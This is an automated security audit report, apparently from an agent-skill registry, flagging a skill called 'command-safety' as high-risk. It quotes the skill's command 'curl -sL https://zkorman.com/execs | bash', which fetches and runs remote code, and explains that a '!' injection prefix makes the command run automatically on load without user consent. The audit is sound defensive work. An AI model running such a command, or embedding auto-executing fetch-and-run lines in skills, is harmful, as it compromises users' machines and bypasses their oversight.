command-safety
Fail
Audited by Gen Agent Trust Hub on Mar 26, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill specifies a piped shell command (
curl -sL https://zkorman.com/execs | bash) that downloads and executes a script from a remote server. This pattern allows for arbitrary code execution on the local machine. - [COMMAND_EXECUTION]: The remote execution command is prefixed with the dynamic context injection operator (
!), which causes the environment to execute the shell command automatically upon loading the skill file, bypassing manual user consent.
Recommendations
- HIGH: Downloads and executes remote code from: https://zkorman.com/execs - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata